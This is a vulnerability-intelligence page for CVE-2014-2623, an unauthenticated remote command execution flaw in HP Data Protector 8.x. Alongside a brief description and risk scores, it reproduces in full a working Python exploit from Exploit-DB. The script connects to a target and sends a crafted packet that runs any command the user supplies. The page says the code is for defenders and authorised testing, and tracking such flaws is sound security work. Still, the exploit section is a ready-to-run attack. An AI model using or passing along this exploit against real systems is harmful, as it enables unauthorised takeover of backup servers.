VIR Vulnerability Intelligence Relay

CVE-2014-2623

critical
Published 2014-07-18 ยท Modified 2026-05-06
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-35961 remote hp-ux verified python ยท 3 KB
Juttikhun Khamchaiyaphum ยท 2015-01-30

HP Data Protector 8.x - Remote Command Execution

python exploit Source: Exploit-DB 
#!/usr/bin/python

# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"

import socket
import struct
import sys

def exploit(host, port, command):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        print "[+] Target connected."

        OFFSET_DEC_START = 133
        OFFSET_DEC = (OFFSET_DEC_START + len(command))
        # print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
        # print "len(command)" + str(len(command))
        # print "OFFSET_DEC" + str(OFFSET_DEC)
        OFFSET_HEX = "%x" % OFFSET_DEC
        # print "OFFSET_HEX" + str(OFFSET_HEX)
        OFFSET_USE = chr(OFFSET_DEC)
        # print "Command Length: " + str(len(command))
        PACKET_DATA = "\x00\x00\x00"+\
        OFFSET_USE+\
        "\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
        "\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
        "\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
        "\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
        "\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
        "\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
        "\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
        "\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
        " %s\x00" %command

        # Send payload to target
        print "[+] Sending PACKET_DATA"
        sock.sendall(PACKET_DATA)

        # Parse the response back
        print "[*] Result:"
        while True:
            response = sock.recv(2048)
            if not response: break
            print response

    except Exception as ex:
        print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
        exit(-3)
    sock.close()

if __name__ == "__main__":
    try:
        target = sys.argv[1]
        port = int(sys.argv[2])
        command = sys.argv[3]
        exploit(target, port, command)
    except IndexError:
         print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
    exit(0)
EDB-36304 remote windows verified
Metasploit ยท 2015-03-06

HP Data Protector 8.10 - Remote Command Execution (Metasploit)

Source code queued for fetch โ€” refresh in a moment.
EDB-34066 remote windows verified
Polunchis ยท 2014-07-14

HP Data Protector Manager 8.10 - Remote Command Execution

Source code queued for fetch โ€” refresh in a moment.

Metasploit modules

exploit_windows/misc/hp_dataprotector_cmd_exec rank 600
HP Data Protector 8.10 Remote Command Execution
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
hp hpstorage_data_protector8.0
hp hpstorage_data_protector8.10

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.